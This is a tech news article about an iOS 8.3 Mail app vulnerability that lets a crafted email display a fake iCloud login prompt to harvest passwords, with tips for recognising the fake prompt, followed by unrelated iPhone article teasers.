Skip to main content
  1. Home
  2. Mobile
  3. News

Beware of iCloud login prompts: A new security flaw lets hackers steal your info

By

iPhone icloud
Shuttershock
Apple’s mobile operating system iOS has a reputation for being more secure than Android, but recently, it seems that more hackers are targeting iPhone and iPad users. A GitHub user by the name of Jansouceket discovered yet another iOS vulnerability back in January and reported it to Apple. The friendly hacker demonstrated how an attack code can be used in the Mail app to steal users’ iCloud logins and other sensitive information.

Apparently, ever since Apple released iOS 8.3 in early April, the Mail app has stopped removing potentially dangerous HTML code from the emails users receive. One tag instructs the Mail app to download and execute code remotely. The command then brings up a form box, which mimics the appearance of an iCloud log in request box. If the user logs in, the hacker can then steal his or her iCloud account user name and password. With these two pieces of information, the hacker can steal other personal information stored in iCloud.

Proof-of-concept: iOS 8.3 Mail.app attack

“This bug allows remote HTML content to be loaded, replacing the content of the original email message,” Jansoucek wrote. “JavaScript is disabled in this UIWebView, but it is still possible to build a functional password ‘collector’ using simple HTML and CSS [cascading style sheets].”

Recommended Videos

To make matters worse, the vulnerability places a tracking cookie in the Mail app, so that the code doesn’t execute the same command every time the infected email is opened in the app. That way, the user doesn’t get suspicious of the message or notice the link between that specific email and the iCloud login prompt. Additionally, the hacker can change the code at any time to access different information.

Luckily, there is a trick iOS users can employ to protect themselves from the hack. Although the malicious code does a pretty good imitation of the iCloud login box, it isn’t perfect. First off, the box asks for both your Apple ID and your password, while iCloud typically asks for only your password and already displays your user name. Secondly, the box isn’t modal, so the background doesn’t fade and the screen isn’t static when the prompt comes up. Additionally, keyboard suggestions remain activated, which is something that never happens when you receive an iCloud prompt on iOS.

Of course, these differences are subtle, and many won’t notice them. Apple has yet to respond, but hopefully the patch will come soon. Until then, the next time you see an iCloud login request, check for these telltale signs to ensure that you’re not being hacked.

Editors' Recommendations

Topics
Malarie Gokey
Malarie Gokey
Former Digital Trends Contributor
As DT's Mobile Editor, Malarie runs the Mobile and Wearables sections, which cover smartphones, tablets, smartwatches, and…
Apple just released iOS 17.4. Here’s how it’s going to change your iPhone
The Apple iPhone 15 Pro Max and iPhone 14 Pro showing the screens.

Apple iPhone 14 Pro (left) and iPhone 15 Pro Max Andy Boxall / Digital Trends

If you have an iPhone, you'll want to check it right now for a big update. The iOS 17.4 update is officially rolling out right now and it includes some fairly significant new features.

Read more
No, the Journal app on your iPhone isn’t spying on you
Apple Journal app on an iPhone 15 Pro.

If you've spent any time on Facebook, TikTok, or any other social media site over the last couple of days, there's a chance you've seen people claiming that your iPhone is spying on you — specifically, with a feature called "Journaling Suggestions."

One post I stumbled across on Facebook made it sound rather frightening, warning me that the feature shares my FULL NAME and EXACTLY where I'm located to anyone nearby. The post told me to go and toggle the setting off immediately because it was "Very scary stuff!!"

Read more
What iPhone do I have? How to find out your iPhone model number
Close-up of the iPhone SE 2022 and iPhone 14 Plus camera modules.

Since its landmark introduction in 2007, Apple has released 42 iPhone models, and with at least four new ones introduced every fall, the company is showing no signs of slowing down.

In all that time, Apple has made relatively few significant design changes. The company tends to stick with established designs for three or four years before changing things up, which can sometimes make it difficult to tell which iPhone model you have —  especially if you're getting a secondhand iPhone (with no box to offer a hint) rather than a new one.

Read more